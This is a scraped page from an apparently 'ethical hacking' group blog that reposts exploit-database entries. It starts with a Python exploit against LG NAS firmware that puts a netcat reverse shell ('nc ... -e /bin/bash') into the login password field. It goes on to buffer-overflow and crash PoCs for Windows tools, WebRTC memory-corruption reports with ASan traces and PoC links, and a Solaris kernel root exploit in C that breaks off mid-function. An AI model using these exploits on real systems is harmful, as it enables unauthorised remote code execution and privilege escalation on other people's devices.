# LG NAS 3718.510.a0 - Remote Command Execution
# Author: @0x616163
# Date: 2018-07-29
# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
# CVE: N/A
# Firmware Version: 3718.510.a0
#!/usr/bin/env python
import sys
import argparse
import requests
from collections import OrderedDict
def checkUser(target):
# Exploiting this vulnerability requires a valid user account
# on the target NAS otherwise the vulnerable code is not executed
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
if r.text == "NG:WRONG PASSWORD\n":
print "[*] Valid user found: admin"
return 0
elif r.text == "NG:NO USER\n":
print "[*] User not found: admin"
sys.exit(1)
def sendPayload(target,lhost,lport):
print "[*] Sending payload.."
try:
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
except requests.exceptions.ReadTimeout:
print "[*] Payload sent. Exiting."
sys.exit(0)
return 0
def main():
parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
results = parser.parse_args()
args = vars(results)
if len(sys.argv) < 1:
parser.print_help()
sys.exit(1)
else:
if checkUser(args['target']) == 0:
sendPayload(args['target'], args['lhost'],args['lport'])
main()
sys.exit(0)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863572722
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC
# Vulnerability Type: SEH Overwrite POC
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-01
# Software Link: http://www.alloksoft.com/fast_splitter.htm
# Tested Version: 1.2
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# Run the python exploit.py , Open "exploit.txt" and copy content.
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.
#!/usr/bin/env python
# SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
# SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
buffer = "\x41" * 544
nseh = "\x42\x42\x42\x42"
seh= "\x43\x43\x43\x43"
exploit = buffer + nseh + seh
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()
# Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-07-27
# Vendor Homepage: https://switchportmapper.com/
# Software Link : http://download.switchportmapper.com/spm281.zip
# Tested Version: 2.81
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python Managed_Switch_Port_Mapping_Tool_2.81.py
# 2.- Open Managed_Switch_Port_Mapping_Tool_2.81.txt and copy content to clipboard
# 3.- Open spmap.exe
# 4.- Switch Group > Settings
# 6.- Paste ClipBoard on "SNMP v1/v2c Read Community Name"
# 7.- OK
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 564
f = open ("Managed_Switch_Port_Mapping_Tool_2.81.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service (PoC)
# Discovery by: Shubham Singh
# Known As: Spirited Wolf Twitter: @Pwsecspirit
# Discovery Date: 2018-07-30
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link: http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows xp Service pack3 x86
# Steps to Reproduce:
# Run the python exploit.py , Open exploit.txt and copy content.
# Open ippulse.exe , Click On "Enter Key".
# In the name field paste the content of "exploit.txt" and in Key type anything.
# Press "OK" and B00m Crashed.
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("exploit.txt", "w")
f.write(buffer)
f.close()
There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block is then treated a pointer, leading to a crash in WebRTC.
==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc 0x0000014cde2f bp 0x7ff20616d7e0 sp 0x7ff20616d7d8
READ of size 1 at 0x6330000a9491 thread T5 (DecodingThread)
#0 0x14cde2e in vp8_deblock third_party/libvpx/source/libvpx/vp8/common/postproc.c:85:37
#1 0x14ce6b2 in vp8_post_proc_frame third_party/libvpx/source/libvpx/vp8/common/postproc.c:354:5
#2 0x14963a4 in vp8dx_get_raw_frame third_party/libvpx/source/libvpx/vp8/decoder/onyxd_if.c:404:9
#3 0x149221f in vp8_get_frame third_party/libvpx/source/libvpx/vp8/vp8_dx_iface.c:465:14
#4 0x148c118 in webrtc::LibvpxVp8Decoder::Decode(webrtc::EncodedImage const&, bool, webrtc::RTPFragmentationHeader const*, webrtc::CodecSpecificInfo const*, long) modules/video_coding/codecs/vp8/libvpx_vp8_decoder.cc:254:9
#5 0x1b930b4 in webrtc::VCMGenericDecoder::Decode(webrtc::VCMEncodedFrame const&, long) modules/video_coding/generic_decoder.cc:233:29
#6 0x1b6fad3 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const&) modules/video_coding/video_receiver.cc:374:19
#7 0x1b6ff19 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const*) modules/video_coding/video_receiver.cc:340:10
#8 0x1af33e4 in webrtc::internal::VideoReceiveStream::Decode() video/video_receive_stream.cc:433:41
#9 0x1aedc8f in webrtc::internal::VideoReceiveStream::DecodeThreadFunction(void*) video/video_receive_stream.cc:410:49
#10 0x6544d3 in Run rtc_base/platform_thread.cc:163:5
#11 0x6544d3 in rtc::PlatformThread::StartThread(void*) rtc_base/platform_thread.cc:81
#12 0x7ff22125e493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
0x6330000a9491 is located 3217 bytes inside of 96619-byte region [0x6330000a8800,0x6330000c016b)
freed by thread T5 (DecodingThread) here:
#0 0x59e3e2 in __interceptor_free /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
#1 0x1492a54 in vp8_de_alloc_frame_buffers third_party/libvpx/source/libvpx/vp8/common/alloccommon.c:41:3
#2 0x1492b0c in vp8_alloc_frame_buffers third_party/libvpx/source/libvpx/vp8/common/alloccommon.c:54:3
#3 0x149126c in vp8_decode third_party/libvpx/source/libvpx/vp8/vp8_dx_iface.c:374:13
#4 0x14d42c5 in vpx_codec_decode third_party/libvpx/source/libvpx/vpx/src/vpx_decoder.c:116:11
#5 0x148c0a1 in webrtc::LibvpxVp8Decoder::Decode(webrtc::EncodedImage const&, bool, webrtc::RTPFragmentationHeader const*, webrtc::CodecSpecificInfo const*, long) modules/video_coding/codecs/vp8/libvpx_vp8_decoder.cc:245:7
#6 0x1b930b4 in webrtc::VCMGenericDecoder::Decode(webrtc::VCMEncodedFrame const&, long) modules/video_coding/generic_decoder.cc:233:29
#7 0x1b6fad3 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const&) modules/video_coding/video_receiver.cc:374:19
#8 0x1b6ff19 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const*) modules/video_coding/video_receiver.cc:340:10
#9 0x1af33e4 in webrtc::internal::VideoReceiveStream::Decode() video/video_receive_stream.cc:433:41
#10 0x1aedc8f in webrtc::internal::VideoReceiveStream::DecodeThreadFunction(void*) video/video_receive_stream.cc:410:49
#11 0x6544d3 in Run rtc_base/platform_thread.cc:163:5
#12 0x6544d3 in rtc::PlatformThread::StartThread(void*) rtc_base/platform_thread.cc:81
#13 0x7ff22125e493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
previously allocated by thread T5 (DecodingThread) here:
#0 0x59e723 in __interceptor_malloc /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
#1 0x1530d92 in vpx_calloc third_party/libvpx/source/libvpx/vpx_mem/vpx_mem.c:60:10
#2 0x1492e12 in vp8_alloc_frame_buffers third_party/libvpx/source/libvpx/vp8/common/alloccommon.c:90:7
#3 0x149126c in vp8_decode third_party/libvpx/source/libvpx/vp8/vp8_dx_iface.c:374:13
#4 0x14d42c5 in vpx_codec_decode third_party/libvpx/source/libvpx/vpx/src/vpx_decoder.c:116:11
#5 0x148c0a1 in webrtc::LibvpxVp8Decoder::Decode(webrtc::EncodedImage const&, bool, webrtc::RTPFragmentationHeader const*, webrtc::CodecSpecificInfo const*, long) modules/video_coding/codecs/vp8/libvpx_vp8_decoder.cc:245:7
#6 0x1b930b4 in webrtc::VCMGenericDecoder::Decode(webrtc::VCMEncodedFrame const&, long) modules/video_coding/generic_decoder.cc:233:29
#7 0x1b6fad3 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const&) modules/video_coding/video_receiver.cc:374:19
#8 0x1b6ff19 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const*) modules/video_coding/video_receiver.cc:340:10
#9 0x1af33e4 in webrtc::internal::VideoReceiveStream::Decode() video/video_receive_stream.cc:433:41
#10 0x1aedc8f in webrtc::internal::VideoReceiveStream::DecodeThreadFunction(void*) video/video_receive_stream.cc:410:49
#11 0x6544d3 in Run rtc_base/platform_thread.cc:163:5
#12 0x6544d3 in rtc::PlatformThread::StartThread(void*) rtc_base/platform_thread.cc:81
#13 0x7ff22125e493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
Thread T5 (DecodingThread) created by T0 here:
#0 0x5871ed in __interceptor_pthread_create /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors.cc:210:3
#1 0x654760 in rtc::PlatformThread::Start() rtc_base/platform_thread.cc:103:3
#2 0x1af010e in webrtc::internal::VideoReceiveStream::Start() video/video_receive_stream.cc:227:18
#3 0x5d9f4d in webrtc::RtpReplay() video/replay.cc:614:19
#4 0x5dd5fe in main video/replay.cc:700:3
#5 0x7ff21f8f92b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-use-after-free third_party/libvpx/source/libvpx/vp8/common/postproc.c:85:37 in vp8_deblock
Shadow bytes around the buggy address:
0x0c668000d240: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d250: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d270: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d280: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c668000d290: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==20098==ABORTING
To reproduce this issue:
1) replace video/replay.cc with the attached version, and build it with asan (ninja -C out/asan video_replay). Note that this file adds the ability to load a full receiver config to the video replay tool, I'm hoping to eventually get this change committed to WebRTC.
2) Download the attached files config3.txt and heapuaf
3) run video_replay --input_file heapuaf --config_file config3.txt
This issue affects any browser that supports VP8, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP8, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45121.zip
There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incoming_rtp_packet, which is an RTP packet with a mac length that is defined by the transport (2048 bytes for DTLS in Chrome). This packet is then copied to the received_packet in several locations in the method, depending on packet properties, using the lenth of the incoming_rtp_packet as the copy length. The received_packet is a ForwardErrorCorrection::ReceivedPacket, which has a max size of 1500. Therefore, the memcpy calls in this method can overflow this buffer.
==204614==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b000046670 at pc 0x00000059d958 bp 0x7ffcac5716f0 sp 0x7ffcac570ea0
WRITE of size 2316 at 0x61b000046670 thread T0
#0 0x59d957 in __asan_memcpy /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
#1 0x1b6aacc in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:173:5
#2 0x1b3cd5c in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:426:27
#3 0x1b39a31 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:402:5
#4 0x1b3a895 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:301:3
#5 0x8c7a26 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#6 0x8cec3d in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#7 0x12e8507 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1291:36
#8 0x12e92a0 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1316:10
#9 0x5da2a6 in webrtc::RtpReplay() video/replay.cc:635:31
#10 0x5dd5fe in main video/replay.cc:700:3
#11 0x7feaa1ee92b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
0x61b000046670 is located 0 bytes to the right of 1520-byte region [0x61b000046080,0x61b000046670)
allocated by thread T0 here:
#0 0x5c9362 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3
#1 0x1b6a8c8 in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:165:35
#2 0x1b3cd5c in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:426:27
#3 0x1b39a31 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:402:5
#4 0x1b3a895 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:301:3
#5 0x8c7a26 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#6 0x8cec3d in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#7 0x12e8507 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1291:36
#8 0x12e92a0 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1316:10
#9 0x5da2a6 in webrtc::RtpReplay() video/replay.cc:635:31
#10 0x5dd5fe in main video/replay.cc:700:3
#11 0x7feaa1ee92b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c3680000c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3680000cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa
0x0c3680000cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
To reproduce this issue:
1) replace video/replay.cc with the attached version, and build it with asan (ninja -C out/asan video_replay). Note that this file adds the ability to load a full receiver config to the video replay tool, I'm hoping to eventually get this change committed to WebRTC.
2) Download the attached files config4.txt and fallbackoob1
3) run video_replay --input_file fallbackoob1 --config_file config4.txt
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45122.zip
Type confusion can occur when processing a H264 packet. In the method PacketBuffer::FindFrames in modules/video_coding/packet_buffer.cc there is a loop on line 296 that goes through the data_buffer_ vector backwards. The flag is_h264 is set before this loop, and if it is true, the loop extracts and sets h264 struct specific data in each packet of the buffer. This flag is not updated for each packet. So if a number of non-h264 packets are followed by a h264 packet, a VP8 or VP9 packet can be treated at a h264 check, allowing several bounds checks to be bypassed.
1) unzip the attached webrtc-from-chat2.zip on a local webserver
2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace pc/srtptransport.cc and third_party/libsrtp/crypto/cipher/cipher.c with the version attached to the issue
3) build webrtc, including the examples
4) run the attached webrtcserver.py with python 3.6 or higher
5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to
6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome
7) Enter any username and hit "Log in"
8) Type anything into the chat window at the bottom and hit send
Though the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.
This issue affects any browser that supports H264, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support H264, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.
Please note it is not sufficient to fix this issue in Chrome, it needs to be upstreamed to webrtc, so all users of the library can get the fix.
Adding stack trace:
#0 0x55bd530e0721 in webrtc::video_coding::PacketBuffer::FindFrames(unsigned short) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/video_coding/packet_buffer.cc:314:33
#1 0x55bd530dcb24 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/video_coding/packet_buffer.cc:126:20
#2 0x55bd530d0592 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:242:19
#3 0x55bd52f225ed in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#4 0x55bd52f16fbd in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/rtp_rtcp/source/rtp_receiver_impl.cc:192:42
#5 0x55bd530d144f in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:410:20
#6 0x55bd530d1142 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:256:3
#7 0x55bd530f8098 in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:239:35
#8 0x55bd530d3fa9 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:430:23
#9 0x55bd530d134b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:401:5
#10 0x55bd530d1fc2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:301:3
#11 0x55bd40d97311 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/rtp_demuxer.cc:157:11
#12 0x55bd40d9c1a1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19
#13 0x55bd52e3fe39 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/call.cc:1292:36
#14 0x55bd52e407e3 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/call.cc:1316:10
#15 0x55bd5358b001 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/media/engine/webrtcvideoengine.cc:1444:26
#16 0x55bd52deb9e2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/pc/channel.cc:0:21
#17 0x55bd52e09370 in rtc::AsyncInvoker::OnMessage(rtc::Message*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/rtc_base/asyncinvoker.cc:45:22
#18 0x55bd52ca1711 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../jingle/glue/thread_wrapper.cc:157:22
#19 0x55bd52ca29ee in jingle_glue::JingleThreadWrapper::RunTask(int) /usr/local/google/home/natashenka/chromium/src/out/asan/../../jingle/glue/thread_wrapper.cc:279:7
#20 0x55bd447abaf5 in Run /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/callback.h:96:12
#21 0x55bd447abaf5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/debug/task_annotator.cc:101:0
#22 0x55bd44809665 in base::MessageLoop::RunTask(base::PendingTask*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_loop.cc:319:25
#23 0x55bd4480a8d4 in DeferOrRunPendingTask /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_loop.cc:329:5
#24 0x55bd4480a8d4 in base::MessageLoop::DoWork() /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_loop.cc:373:0
#25 0x55bd44812bff in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_pump_default.cc:37:31
#26 0x55bd4487fdb1 in base::RunLoop::Run() /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/run_loop.cc:131:14
#27 0x55bd448ff6c4 in base::Thread::ThreadMain() /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/threading/thread.cc:337:3
#28 0x55bd449ccaa4 in base::(anonymous namespace)::ThreadFunc(void*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/threading/platform_thread_posix.cc:76:13
#29 0x7fedd89fa493 in start_thread ??:0:0
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45123.zip
/*
# Exploit Title: Solaris/OpenSolaris AVS kernel code execution
# Google Dork: [if applicable]
# Date: 24/7/2018
# Exploit Author: mu-b
# Vendor Homepage: oracle.com
# Software Link:
# Version: Solaris 10, Solaris <= 11.3
# Tested on: Solaris 11.X, OpenSolaris
# CVE : CVE-2018-2892
http://digit-labs.org/files/exploits/sdbc-testinit.c
http://digit-labs.org/files/exploits/sdbc-testinit-v2.c
a few more added to digit-labs as well, old irix-espd remote root for
irix as well.
/* sdbc-testinit.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Sun Opensolaris <= snv_104 local kernel root exploit
* by mu-b - Sun 21 Dec 2008
*
* $Id: sdbc-testinit.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Opensolaris snv_104 (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl32_s {
unsigned int arg0;
unsigned int arg1;
unsigned int arg2;
unsigned int arg3;
unsigned int arg4;
unsigned int magic;
unsigned int ustatus;
unsigned int pad[1];
} _sdbc_ioctl32_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
#define KTHREAD 0x16
#else
#define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0xc(%eax)");
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
